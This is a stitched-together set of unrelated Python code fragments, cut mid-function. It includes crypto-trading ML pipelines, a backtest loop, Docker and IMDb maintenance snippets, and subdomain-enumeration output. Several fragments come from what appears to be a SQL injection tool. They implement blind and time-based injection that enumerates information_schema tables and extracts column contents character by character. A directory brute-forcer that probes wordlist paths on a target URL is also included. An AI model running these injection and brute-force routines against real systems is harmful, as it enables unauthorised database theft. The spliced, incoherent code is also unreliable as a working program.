build_injection(select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False): retVal = build_injection( select="ascii(substring(" + column_name + "," + repr(j + 1) + ",1))", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的length retVal = time_injection(select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Database sqli' % (limits + 1), leave=False): retVal = time_injection( select="ascii(substring(" + column_name + "," + repr(j + 1) + ",1))", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) logger.debug("Sqli table %s column %s limit %d success..." % (table_name, column_name, limits))
def run_content(self): if len(self.columns_name) == 0: SqliColumns.get_columns(self) # 循环解包,进入注入 for database_name in self.columns_name: for table_name in self.columns_name[database_name]: # 获取数据的条数,如果小于设置的self.content_count,那需要设置条数等于self.content_count content_counts = self.get_content_count( database_name, table_name) if content_counts == 0: logger.warning('Database %s Table %s is empty...' % (database_name, table_name)) continue elif content_counts != self.content_count: logger.debug( 'Database %s Table %s content amount change to %d' % (database_name, table_name, content_counts)) self.content_count = content_counts else: pass # 声明一个表储存数据 content = PrettyTable( list(self.columns_name[database_name][table_name])) content.padding_width = 1 content.align = "r" # 每个表都要注入指定条数那么多次 for limits in xrange(self.content_count): # 声明一个队列,储存返回的值 result = Queue.Queue() # 声明线程队列、结果队列和最终插入table的数据队列 threads = [] results = [] contents = [] # 开始多线程的注入 logger.debug("Start multithreading Sqli...") for column_name in self.columns_name[database_name][ table_name]: # 开始一个线程注入一个字段 try: t = threading.Thread( target=self.get_content, name='thread for %s' % column_name, args=(result, database_name, table_name, column_name, limits)) t.start() except ConnectionError: logger.error('Thread error...') pass threads.append(t) # 等待所有线程结束 for t in threads: t.join() # 注入处理返回数据,插入content中的一条 while not result.empty(): results.append(result.get()) # 处理返回的数据 for i in list( self.columns_name[database_name][table_name]): for item in results: if item[0] == i: contents.append(item[1]) else: continue # 插入数据 content_str = ','.join(contents) logger.info("Sqli success content is %s" % content_str) content.add_row(contents) # 输出表 logger.debug("Database %s Table %s sqli success..." % (database_name, table_name)) print "[*] Database %s Table %s content:" % (database_name, table_name) print content
def main(): index = load_dataset('all_merged', return_index=True) for _sym, data in index.items(): features, target = get_symbol_features(index, _sym) features_p = features[data['features']['ohlcv']].pct_change().replace( [np.inf, -np.inf], np.nan) features_p.columns = [c + '_p1' for c in features_p.columns] features_1 = features_p.shift(1) features_1.columns = [c + '_lag1' for c in features_1.columns] features_2 = features_p.shift(2) features_2.columns = [c + '_lag2' for c in features_2.columns] features_mean = features_p.rolling(3).mean() features_mean.columns = [c + '_mean_3' for c in features_mean.columns] ta = features[data['features']['ta'] + data['features']['ta_7d'] + data['features']['ta_30d']] features = pd.concat([ features['close'], ta, features_p, features_1, features_2, features_mean ], axis=1)[30:] target = target[30:] # Split data in train and blind test set with 70:30 ratio, # most ML models don't take sequentiality into account, but our pipeline # uses a SimpleImputer with mean strategy, so it's best not to shuffle the data. X_train, X_test, y_train, y_test = train_test_split(features.values, target.values, shuffle=False, test_size=0.3) logger.info("Start Feature Selection") imp = SimpleImputer() values = imp.fit_transform(X_train) #sel = SelectKBest(score_func=f_classif, k=min(10, X_train.shape[1])) feature_count = int(0.3 * X_train.shape[1]) sel = RFECV(estimator=RandomForestClassifier(), cv=5, verbose=0, n_jobs=4, min_features_to_select=feature_count, scoring='neg_mean_squared_error') sel.fit(values, y_train) logger.info("End Feature Selection") bestfeatures = [ c for c, f in zip(features.columns, sel.get_support()) if f ] if not 'close' in bestfeatures: bestfeatures += ['close'] print("Using features:\n{}".format(bestfeatures, len(bestfeatures))) train_features = pd.DataFrame(X_train, columns=features.columns) test_features = pd.DataFrame(X_test, columns=features.columns) X_train = train_features[bestfeatures].values X_test = test_features[bestfeatures].values # Summarize distribution print("Training set: # Features {}, # Samples {}".format( X_train.shape[1], X_train.shape[0])) plot_class_distribution("Training set", _sym, y_train) print("Test set: # Features {}, # Samples {}".format( X_test.shape[1], X_test.shape[0])) plot_class_distribution("Test set", _sym, y_test) if not np.isfinite(X_train).all(): logger.warning("Training x is not finite!") if not np.isfinite(y_train).all(): logger.warning("Training y is not finite!") if not np.isfinite(X_test).all(): logger.warning("Test x is not finite!") if not np.isfinite(y_test).all(): logger.warning("Test y is not finite!") # Build pipeline to be used as estimator in grid search # so that each subset of the data is transformed independently # to avoid contamination between folds. pipeline = Pipeline([ ( 'i', IterativeImputer() ), # Replace nan's with the median value between previous and next observation ('s', MinMaxScaler(feature_range=(-1, 1))), ('c', MLPClassifier()), ]) # Perform hyperparameter tuning of the ensemble with 5-fold cross validation logger.info("Start Grid search") CV_rfc = GridSearchCV(estimator=pipeline, param_grid=PARAM_GRID, cv=5, n_jobs=4, scoring='neg_mean_squared_error', verbose=1) CV_rfc.fit(X_train, y_train) logger.info("End Grid search") # Take the fitted ensemble with tuned hyperparameters clf = CV_rfc.best_estimator_ # Test ensemble's performance on training and test sets logger.info("Classification report on train set") predictions1 = clf.predict(X_train) train_report = classification_report(y_train, predictions1, output_dict=True) print(classification_report(y_train, predictions1)) logger.info("Classification report on test set") predictions2 = clf.predict(X_test) test_report = classification_report(y_test, predictions2, output_dict=True) print(classification_report(y_test, predictions2)) stats = { 'score': accuracy_score(y_train, predictions1), 'mse': mean_squared_error(y_train, predictions1), 'test_score': accuracy_score(y_test, predictions2), 'test_mse': mean_squared_error(y_test, predictions2), 'train_report': train_report, 'test_report': test_report, } print(CV_rfc.best_params_) num_samples = min(y_train.shape[0], y_test.shape[0], 30) print("Gains calculated on {} samples only!".format(num_samples)) print( "Train Accuracy: {}\nTrain MSE: {}\nGains on train preds: 100 -> {}" .format( accuracy_score(y_train, predictions1), mean_squared_error(y_train, predictions1), test_gains(train_features['close'][0:num_samples], predictions1[0:num_samples], initial_balance=100, position_size=0.1))) print( "Test Accuracy: {}\nTest MSE: {}\nGains on test preds: 100 -> {}". format( accuracy_score(y_test, predictions2), mean_squared_error(y_test, predictions2), test_gains(test_features['close'][0:num_samples], predictions2[0:num_samples], initial_balance=100, position_size=0.1))) print("--- end ---")
def build(source_index, dest_index, W=10): _dataset = load_dataset(source_index, return_index=True) for _sym, entry in _dataset.items(): _df = pd.read_csv(entry['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) _target = pd.read_csv(entry['target_csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) ohlcv = _df[entry['features']['ohlcv']] ohlcv_d = { d: _df[entry['features']['ohlcv_{}d'.format(d)]] for d in [3, 7, 30] } ta_d = { d: _df[entry['features']['ta_{}d'.format(d)]] for d in [3, 7, 30] } ta = _df[entry['features']['ta']] cm = _df[entry['features']['cm']] cm_picked = pd.DataFrame(index=ohlcv.index) if 'adractcnt' in cm.columns: cm_picked['adractcnt_pct'] = cm.adractcnt.pct_change() # cm_picked['adractcnt_mean3_pct'] = cm.adractcnt.rolling(3).mean().pct_change() # cm_picked['adractcnt_mean7_pct'] = cm.adractcnt.rolling(7).mean().pct_change() # if 'splycur' in cm.columns: ## Correlated with volume and close # cm_picked['vol_supply'] = ohlcv.volume / cm.splycur # Ratio between transacted volume and total supply (mined) if 'txtfrvaladjntv' in cm.columns and 'isstotntv' in cm.columns and 'feetotntv' in cm.columns: # I want to represent miners earnings (fees + issued coins) vs amount transacted in that interval cm_picked['earned_vs_transacted'] = ( cm.isstotntv + cm.feetotntv) / cm.txtfrvaladjntv if 'isstotntv' in cm.columns: # isstotntv is total number of coins mined in the time interval # splycur is total number of coins mined (all time) total_mined = cm.isstotntv.rolling( 365, min_periods=7).sum() # total mined in a year cm_picked['isstot365_isstot1_pct'] = (cm.isstotntv / total_mined).pct_change() if 'splycur' in cm.columns and 'isstotntv' in cm.columns: cm_picked['splycur_isstot1_pct'] = (cm.isstotntv / cm.splycur).pct_change() if 'hashrate' in cm.columns: #cm_picked['hashrate_mean3_pct'] = cm.hashrate.rolling(3).mean().pct_change() #cm_picked['hashrate_mean7_pct'] = cm.hashrate.rolling(7).mean().pct_change() cm_picked['hashrate_pct'] = cm.hashrate.pct_change() if 'roi30d' in cm.columns: cm_picked['roi30d'] = cm.roi30d if 'isstotntv' in cm.columns: cm_picked['isstotntv_pct'] = cm.isstotntv.pct_change() if 'feetotntv' in cm.columns: cm_picked['feetotntv_pct'] = cm.feetotntv.pct_change() if 'txtfrcount' in cm.columns: cm_picked['txtfrcount_pct'] = cm.txtfrcount.pct_change() #cm_picked['txtfrcount_volume'] = cm.txtfrcount.pct_change() if 'vtydayret30d' in cm.columns: cm_picked['vtydayret30d'] = cm.vtydayret30d if 'isscontpctann' in cm.columns: cm_picked['isscontpctann'] = cm.isscontpctann ta_picked = pd.DataFrame(index=ta.index) # REMA / RSMA are already used and well-estabilished in ATSA, # I'm taking the pct change since i want to encode the relative movement of the ema's not their positions # ta_picked['rema_5_20_pct'] = ta.rema_5_20.pct_change() ta_picked['rema_8_15_pct'] = ta.rema_8_15.pct_change() # ta_picked['rema_20_50_pct'] = ta.rema_20_50.pct_change() # ta_picked['rsma_5_20_pct'] = ta.rema_5_20.pct_change() ta_picked['rsma_8_15_pct'] = ta.rema_8_15.pct_change() # ta_picked['rsma_20_50_pct'] = ta.rema_20_50.pct_change() # Stoch is a momentum indicator comparing a particular closing price of a security to a range of its prices # over a certain period of time. # The sensitivity of the oscillator to market movements is reducible by adjusting that time period or # by taking a moving average of the result. # It is used to generate overbought and oversold trading signals, utilizing a 0-100 bounded range of values. # IDEA => decrease sensitivity by 3-mean and divide by 100 to get fp values ta_picked['stoch_14_mean3_div100'] = ta.stoch_14.rolling( 3).mean() / 100 #Moving Average Convergence Divergence (MACD) is a trend-following momentum indicator that shows # the relationship between two moving averages of a security’s price. # The MACD is calculated by subtracting the 26-period Exponential Moving Average (EMA) from the 12-period EMA. # A nine-day EMA of the MACD called the "signal line," is then plotted on top of the MACD line, # which can function as a trigger for buy and sell signals. # Traders may buy the security when the MACD crosses above its signal line and sell - or short - the security # when the MACD crosses below the signal line. # Moving Average Convergence Divergence (MACD) indicators can be interpreted in several ways, # but the more common methods are crossovers, divergences, and rapid rises/falls. signal_line = builder.exponential_moving_average(ta.macd_12_26, 9) ta_picked[ 'macd_12_26_signal'] = signal_line # Relationship with signal line ta_picked['macd_12_26_diff_signal'] = ( ta.macd_12_26 - signal_line).pct_change() # Relationship with signal line ta_picked['macd_12_26_pct'] = ta.macd_12_26.pct_change( ) # Information about slope # PPO is identical to the moving average convergence divergence (MACD) indicator, # except the PPO measures percentage difference between two EMAs, while the MACD measures absolute (dollar) difference. signal_line = builder.exponential_moving_average(ta.ppo_12_26, 9) ta_picked[ 'ppo_12_26_signal'] = signal_line # Relationship with signal line ta_picked['ppo_12_26_diff_signal'] = ( ta.ppo_12_26 - signal_line).pct_change() # Relationship with signal line ta_picked['ppo_12_26_pct'] = ta.ppo_12_26.pct_change( ) # Information about slope # ADI Accumulation/distribution is a cumulative indicator that uses volume and price to assess whether # a stock is being accumulated or distributed. # The accumulation/distribution measure seeks to identify divergences between the stock price and volume flow. # This provides insight into how strong a trend is. If the price is rising but the indicator is falling # this indicates that buying or accumulation volume may not be enough to support # the price rise and a price decline could be forthcoming. # ==> IDEA: if we can fit a line to the price y1 = m1X+q1 and a line to ADI y2=m2X+q2 then we can identify # divergences by simply looking at the sign of M. # Another insight would be given by the slope (ie pct_change) ta_picked['adi_pct'] = ta.adi.pct_change() ta_picked['adi_close_convergence'] = convergence_between_series( ta.adi, ohlcv.close, 3) # RSI goes from 0 to 100, values <= 20 mean BUY, while values >= 80 mean SELL. # Dividing it by 100 to get a floating point feature, makes no sense to pct_change it ta_picked['rsi_14_div100'] = ta.rsi_14 / 100 # The Money Flow Index (MFI) is a technical indicator that generates overbought or oversold # signals using both prices and volume data. The oscillator moves between 0 and 100. # An MFI reading above 80 is considered overbought and an MFI reading below 20 is considered oversold, # although levels of 90 and 10 are also used as thresholds. # A divergence between the indicator and price is noteworthy. For example, if the indicator is rising while # the price is falling or flat, the price could start rising. ta_picked['mfi_14_div100'] = ta.mfi_14 / 100 # The Chande momentum oscillator is a technical momentum indicator similar to other momentum indicators # such as Wilder’s Relative Strength Index (Wilder’s RSI) and the Stochastic Oscillator. # It measures momentum on both up and down days and does not smooth results, triggering more frequent # oversold and overbought penetrations. The indicator oscillates between +100 and -100. # Many technical traders add a 10-period moving average to this oscillator to act as a signal line. # The oscillator generates a bullish signal when it crosses above the moving average and a # bearish signal when it drops below the moving average. ta_picked['cmo_14_div100'] = ta.cmo_14 / 100 signal_line = builder.simple_moving_average(ta.cmo_14, 10) ta_picked['cmo_14_signal'] = signal_line ta_picked['cmo_14_diff_signal'] = (ta.cmo_14 - signal_line) / 100 # On-balance volume (OBV) is a technical trading momentum indicator that uses volume flow to predict changes in stock price. # Eventually, volume drives the price upward. At that point, larger investors begin to sell, and smaller investors begin buying. # Despite being plotted on a price chart and measured numerically, # the actual individual quantitative value of OBV is not relevant. # The indicator itself is cumulative, while the time interval remains fixed by a dedicated starting point, # meaning the real number value of OBV arbitrarily depends on the start date. # Instead, traders and analysts look to the nature of OBV movements over time; # the slope of the OBV line carries all of the weight of analysis. => We want percent change ta_picked['obv_pct'] = ta.obv.pct_change() ta_picked['obv_mean3_pct'] = ta.obv.rolling(3).mean().pct_change() # Strong rallies in price should see the force index rise. # During pullbacks and sideways movements, the force index will often fall because the volume # and/or the size of the price moves gets smaller. # => Encoding the percent variation could be a good idea ta_picked['fi_13_pct'] = ta.fi_13.pct_change() ta_picked['fi_50_pct'] = ta.fi_50.pct_change() # The Aroon Oscillator is a trend-following indicator that uses aspects of the # Aroon Indicator (Aroon Up and Aroon Down) to gauge the strength of a current trend # and the likelihood that it will continue. # It moves between -100 and 100. A high oscillator value is an indication of an uptrend # while a low oscillator value is an indication of a downtrend. ta_picked['ao_14'] = ta.ao_14 / 100 # The average true range (ATR) is a technical analysis indicator that measures market volatility # by decomposing the entire range of an asset price for that period. # ATRP is pct_change of volatility ta_picked['atrp_14'] = ta.atrp_14 # Percentage Volume Oscillator (PVO) is momentum volume oscillator used in technical analysis # to evaluate and measure volume surges and to compare trading volume to the average longer-term volume. # PVO does not analyze price and it is based solely on volume. # It compares fast and slow volume moving averages by showing how short-term volume differs from # the average volume over longer-term. # Since it does not care a trend's factor in its calculation (only volume data are used) # this technical indicator cannot be used alone to predict changes in a trend. ta_picked['pvo_12_26'] = ta.pvo_12_26 # IGNORED: tsi, wd, adx, #lagged_stats = pd.concat([ohlcv_stats] + [builder.make_lagged(ohlcv_stats, i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner') # Build the dataframe with base features # lagged_close = pd.concat([ohlcv.close.pct_change()] + [builder.make_lagged(ohlcv.close.pct_change(), i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner') # lagged_close.columns = ['close_pct'] + ['close_pct_lag-{}'.format(i) for i in range(1, W +1)] ohlc = ohlcv[['open', 'high', 'low', 'close', 'volume']].pct_change() ohlc.columns = ['{}_pct'.format(c) for c in ohlcv.columns] lagged_ohlc_pct = pd.concat( [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)], axis='columns', verify_integrity=True, sort=True, join='inner') _time = pd.DataFrame(index=ohlcv.index) _time['day_of_year'] = ohlcv.index.dayofyear _time['day_of_week'] = ohlcv.index.dayofweek ohlc = ohlcv[['open', 'high', 'low', 'close', 'volume']] x_space = np.linspace(0, ohlc.index.size, ohlc.index.size) _splines = pd.DataFrame(index=ohlcv.index) # Highly correlated between themselves, no use # _splines['open_spl'] = get_spline(ohlc.open, 0) # _splines['high_spl'] = get_spline(ohlc.high, 0) # _splines['low_spl'] = get_spline(ohlc.low, 0) # _splines['close_spl'] = get_spline(ohlc.close, 0) _splines['open_spl_d1'] = builder.get_spline(ohlc.open, 1) _splines['high_spl_d1'] = builder.get_spline(ohlc.high, 1) _splines['low_spl_d1'] = builder.get_spline(ohlc.low, 1) _splines['close_spl_d1'] = builder.get_spline(ohlc.close, 1) _splines['open_spl_d2'] = builder.get_spline(ohlc.open, 2) _splines['high_spl_d2'] = builder.get_spline(ohlc.high, 2) _splines['low_spl_d2'] = builder.get_spline(ohlc.low, 2) _splines['close_spl_d2'] = builder.get_spline(ohlc.close, 2) _patterns = builder.get_talib_patterns(ohlcv) _new_features = pd.DataFrame(index=ohlcv.index) _new_features['candlestick_patterns_mean'] = _patterns.mean(axis=1) _new_features['candlestick_patterns_sum'] = _patterns.sum(axis=1) # WE LIKE THESE TWO!!!! _new_features['close_volatility_7d'] = ohlcv.close.pct_change( ).rolling(7).std(ddof=0) _new_features['close_volatility_30d'] = ohlcv.close.pct_change( ).rolling(30).std(ddof=0) # # Candle body size variation, for example _new_features['close_open_pct'] = ( ohlcv.close - ohlcv.open ).pct_change() # Change in body of the candle (> 0 if candle is green) _new_features['high_close_dist_pct'] = ( ohlcv.high - ohlcv.close ).pct_change( ) # Change in wick size of the candle, shorter wick should be bullish _new_features['low_close_dist_pct'] = ( ohlcv.close - ohlcv.low ).pct_change( ) # Change in shadow size of the candle, this increasing would indicate support (maybe a bounce) _new_features['high_low_dist_pct'] = ( ohlcv.high - ohlcv.low ).pct_change( ) # Change in total candle size, smaller candles stands for low volatility for d in [3, 7, 30]: ohlcv_d[d].columns = ['close', 'high', 'low', 'open', 'volume'] _new_features['close_open_pct_d{}'.format(d)] = ( ohlcv_d[d].close - ohlcv_d[d].open).pct_change() _new_features['high_close_dist_pct_d{}'.format(d)] = ( ohlcv_d[d].high - ohlcv_d[d].close).pct_change() _new_features['low_close_dist_pct_d{}'.format(d)] = ( ohlcv_d[d].close - ohlcv_d[d].low).pct_change() _new_features['high_low_dist_pct_d{}'.format(d)] = ( ohlcv_d[d].high - ohlcv_d[d].low).pct_change() _ta_windowed_features = pd.concat([ v.rename(columns={c: '{}_ta{}d'.format(c, d) for c in v.columns}) for d, v in ta_d.items() ], axis=1) # Add lagged features to the dataframe ta.columns = ['{}_ta1d'.format(c) for c in ta.columns] feature_groups = [ _new_features, _splines, lagged_ohlc_pct, cm_picked, ta_picked, _ta_windowed_features, ta ] improved_df = pd.concat(feature_groups, axis='columns', verify_integrity=True, sort=True, join='inner') # Drop the first 30 rows improved_df = improved_df[30:] # Drop columns whose values are all nan or inf with pd.option_context('mode.use_inf_as_na', True): # Set option temporarily improved_df = improved_df.dropna(axis='columns', how='all') logger.info('Saving {}'.format(_sym)) save_symbol_dataset(dest_index, _sym, improved_df, target=_target) logger.info('Saved {}'.format(_sym))
def stop_container(self, name=None, id=None): for c in self.containers.values(): if (not name and not id) or id==c['Id'] or (name and name in c['Names']): self.client.kill(c['Id']) self.client.remove_container(c['Id'], force=True) L.info("Stopped container %(Name)s (%(Status)s)"%c)
def run(self): domain_list = self.enumerate() for domain in domain_list: self.domain_name.append(domain) logger.info("{0} found {1} domains".format(self.engine_name, len(self.domain_name))) return self.domain_name,self.smiliar_domain_name,self.related_domain_name,self.email
def trading_day(day, symbols, signals, order_size=0.1, history=None): if not signals.shape[0] and not signals.shape[1]: return session = DBSession() result = pd.DataFrame() exchange = Exchange(session) for s in symbols: # If there's no signal for this coin, close the position if not s in signals.columns: continue signal = signals['{}'.format(s)].iloc[0] close = signals['{}_close'.format(s)].iloc[0] label = signals['{}_label'.format(s)].iloc[0] if np.isnan(signal) or np.isnan(close): # If signal is nan continue # if history is not None and not history.empty: # signal_history = history['{}'.format(s)] # close_history = history['{}_close'.format(s)] # label_history = history['{}_label'.format(s)] # precision = precision_score(label_history.values, signal_history.values, average='micro', zero_division=True) # Fit an spline on available historical data, needs at least 7 days of activity #history_length = close_history.shape[0] #if history_length > 0: # Check last label is correct #check_signal(label_history.values[-1], close, close_history.values[-1]) #-- # hist = close_history.copy() # hist.loc[day] = close # pct = hist.pct_change().values[-1] # if history_length >= 7: # x_space = np.linspace(0, history_length - 1, history_length) # close_spline = UnivariateSpline(x_space, close_history.values, s=0, k=4) # d1 = close_spline(history_length - 1, nu=1) # d2 = close_spline(history_length - 1, nu=2) # logger.info( # "[Trading day: {}] {} | Signal: {} True: {} Precision: {} | Close: {} Pct: {} d1: {} d2: {}".format( # day, s, signal, label, precision, close, pct, d1, d2 # )) # else: # logger.info("[Trading day: {}] {} | Signal: {} True: {} Precision: {} | Close: {} Pct: {}".format( # day, s, signal, label, precision, close, pct # )) #signal = label # Grab balance for current symbol asset = exchange.get_or_create_asset(s, margin_fiat=10000, coins=0) # # Order management # # Manage LONG orders open_longs = exchange.get_open_long(asset) for o in open_longs: # If close meets stop loss, close position if o.should_stop(close): logger.info( '[Day: {}] Closing long position {} on {} due to stop loss' .format(day, o.id, o.symbol)) exchange.close_order(day, asset, o, o.stop_loss) continue # If signal is SELL or position has a 1% profit if signal == SignalType.SELL: logger.info( '[Day: {}] Closing long position {} on {} due to SELL signal' .format(day, o.id, o.symbol)) exchange.close_order(day, asset, o, close) continue # Manage SHORT orders open_shorts = exchange.get_open_short(asset) for o in open_shorts: # If close meets stop loss, close position if o.should_stop(close): logger.info( '[Day: {}] Closing short position {} on {} due to stop loss' .format(day, o.id, o.symbol)) exchange.close_order(day, asset, o, o.stop_loss) continue # If signal is BUY we're going to lose money, so we close position if signal == SignalType.BUY: logger.info( '[Day: {}] Closing short position {} on {} due to BUY signal' .format(day, o.id, o.symbol)) exchange.close_order(day, asset, o, close) continue # If signal is HOLD and position is old if o.get_age_in_days(day) > 2 and signal == SignalType.HOLD: logger.info( '[Day: {}] Closing short position {} on {} due to age'. format(day, o.id, o.symbol)) exchange.close_order(day, asset, o, close) continue # # Open new positions # # Determine position sizing position_coins = asset.position_size(close, order_size) # Open the order if signal == SignalType.BUY: logger.info( '[Day: {}] Opening long position on {} due to BUY signal [Close {}, Price {}, Coins {}]' .format(day, s, close, position_coins * close, position_coins)) o = exchange.open_order(day, OrderType.LONG, asset, position_coins, close, stop_loss=-0.01) # Stop loss is -1% if not o: logger.error("LONG FAILED") elif signal == SignalType.SELL: logger.info( '[Day: {}] Opening short position on {} due to BUY signal [Close {}, Price {}, Coins {}]' .format(day, s, close, position_coins * close, position_coins)) o = exchange.open_order(day, OrderType.SHORT, asset, position_coins, close, stop_loss=0.01) # Stop loss is +1% if not o: logger.error("SHORT FAILED") # Add result to dataframe result.loc[day, s] = asset.equity(close) session.commit() return result
for brute in attempt_list: url = "%s%s" % (target_url, urllib.quote(brute)) # print url try: headers = {} headers["User-Agent"] = conf['ua'] r = urllib2.Request(url, headers=headers) # pbar.update(1) try: response = urllib2.urlopen(r, timeout=2) except: logger.error("Time out...") continue # 有可能卡死 # 请求完成后睡眠 time.sleep(stime) if response.code != 404: logger.info("Get !!!!" + url) tqdm.write("[%d] => %s" % (response.code, url)) except urllib2.URLError, e: if hasattr(e, 'code') and e.code != 404: tqdm.write("!!! %d => %s" % (e.code, url)) logger.info("The dictionary queue is empty") pbar.close() exit(0)
def getDetection(): logger.info("Received %s" %(request.url)) return json.dumps(active.getDetection())
def getDetection(): global DETECTION logger.info("DETECTION status %s" %(str(DETECTION))) return DETECTION
def print_banner(self): logger.info("Searching now in {0}..".format(self.engine_name)) return
def main(): index = load_dataset('all_merged', return_index=True) resultFile = './data/datasets/all_merged/estimators/randomforest_hyperparameters.json' estFile = './data/datasets/all_merged/estimators/randomforest_{}.p' hyperparameters = {} for _sym, data in index.items(): features = pd.read_csv(data['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) # Replace nan with infinity so that it can later be imputed to a finite value features = features.replace([np.inf, -np.inf], np.nan) # Derive target classes from closing price target_pct = target_price_variation(features['close']) target = target_binned_price_variation(target_pct, n_bins=2) # target = target_discrete_price_variation(target_pct) # Split data in train and blind test set with 70:30 ratio, # most ML models don't take sequentiality into account, but our pipeline # uses a SimpleImputer with mean strategy, so it's best not to shuffle the data. X_train, X_test, y_train, y_test = train_test_split(features.values, target.values, shuffle=False, test_size=0.3) # Summarize distribution print("Training set: # Features {}, # Samples {}".format( X_train.shape[1], X_train.shape[0])) plot_class_distribution("Training set", _sym, y_train) print("Test set: # Features {}, # Samples {}".format( X_test.shape[1], X_test.shape[0])) plot_class_distribution("Test set", _sym, y_test) if not np.isfinite(X_train).all(): logger.warning("Training x is not finite!") if not np.isfinite(y_train).all(): logger.warning("Training y is not finite!") if not np.isfinite(X_test).all(): logger.warning("Test x is not finite!") if not np.isfinite(y_test).all(): logger.warning("Test y is not finite!") # Build pipeline to be used as estimator in bagging classifier # so that each subset of the data is transformed independently # to avoid contamination between folds. pipeline = Pipeline([ ( 'i', SimpleImputer() ), # Replace nan's with the median value between previous and next observation ( 's', RobustScaler() ), # Scale data in order to center it and increase robustness against noise and outliers #('k', SelectKBest()), # Select top 10 best features #('u', RandomUnderSampler()), ('c', RandomForestClassifier()), ]) # Perform hyperparameter tuning of the ensemble with 5-fold cross validation logger.info("Start Grid search") CV_rfc = GridSearchCV(estimator=pipeline, param_grid=RANDOMFOREST_PARAM_GRID, cv=5, n_jobs=4, scoring='neg_mean_squared_error', verbose=1) CV_rfc.fit(X_train, y_train) logger.info("End Grid search") # Take the fitted ensemble with tuned hyperparameters clf = CV_rfc.best_estimator_ # Test ensemble's performance on training and test sets logger.info("Classification report on train set") predictions1 = clf.predict(X_train) print(classification_report(y_train, predictions1)) logger.info("Classification report on test set") predictions2 = clf.predict(X_test) print(classification_report(y_test, predictions2)) stats = { 'score': accuracy_score(y_train, predictions1), 'mse': mean_squared_error(y_train, predictions1), 'test_score': accuracy_score(y_test, predictions2), 'test_mse': mean_squared_error(y_test, predictions2), 'cv_best_mse': -1 * CV_rfc.best_score_, # CV score is negated MSE # 'cv_results': CV_rfc.cv_results_, 'cv_bestparams': CV_rfc.best_params_, } print(stats) with open(estFile.format(_sym), 'wb') as f: pickle.dump(clf, f) hyperparameters[_sym] = { 'estimator': estFile.format(_sym), 'stats': stats } # feature_importances = np.mean([ # p.named_steps.c.feature_importances_ for p in clf.estimators_ # ], axis=0) # importances = {X.columns[i]: v for i, v in enumerate(feature_importances)} # labeled = {str(k): v for k, v in sorted(importances.items(), key=lambda item: -item[1])} # print({ # # 'features':sel_features # 'feature_importances': labeled, # # 'rank': {l: i + 1 for i, l in enumerate(labeled.keys())}, # }) with open(resultFile, 'w') as f: # Save results at every update json.dump(hyperparameters, f, indent=4) print("--- end ---")
# 移除有重複imdbid的資料 imdb_manager.remove_duplicate_imdb() # 備份 imdb_manager.backup() # 匯出資料庫到lmdb imdb_manager.export2lmdb(lmdb_operator.HOST, lmdb_operator.DB) # 將imdbid匯出成csv imdbcsv_path = imdb_manager.imdbid2csv() # lmdb # 將imdbid匯入到lmdb lmdb_manager.import_imdbid(imdbcsv_path) # 更新lmdb中其他來源(開眼、豆瓣…)有,但是imdb來源卻沒有找到的電影 lmdb_manager.update_imdb_miss_movies() # 更新由imdb網站parse的電影 lmdb_manager.update_imdb_parsed_movies() # fixme """ 目前的方法是相信imdbpy取得的imdbid是正確的,並且以imdb資料庫的資料為主,若沒有才去imdb網站抓 若imdbpy取得的imdbid錯誤,則會一直無法更正,要如何自動進行更新? """ ed = datetime.datetime.now() message = 'start:%s \t end:%s' % (st, ed) logger.info(message) except Exception: print traceback.format_exc() sendmail(traceback.format_exc())
def get_tables(self): # 若databases_name未设置,就跑一下 if len(self.databases_name) == 0: logger.debug("Set the parameters of the self.databases_name...") SqliDatabases.get_database(self) # 每个databases_name需要跑一次tables_name for database_name in self.databases_name: # 开始跑database_name logger.debug("Start sqli databases %s's tables_name" % database_name) tables_name = [] logger.debug("The sqlirequest is %s, start sqli tables..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table amount sqli...") # 先注tables的数量 tables_number = normal_injection( select='COUNT(*)', source="information_schema.tables", conditions="table_schema = '" + database_name + "'", dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Table account sqli success...The tables_number is %d..." % tables_number) print "[*] tables_number: %d" % tables_number # 每个循环跑一次tables的数据 for i in trange(int(tables_number), desc="Table sqli...", leave=False, disable=True): # 首先是tablename的长度 logger.debug("Start %dth table length sqli..." % (i + 1)) table_name_len = normal_injection( select='length(`table_name`)', source="information_schema.tables", conditions="table_schema = '" + database_name + "'", limit=i, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "%dth Table name length sqli success...The table_name_len is %d..." % ((i + 1), table_name_len)) 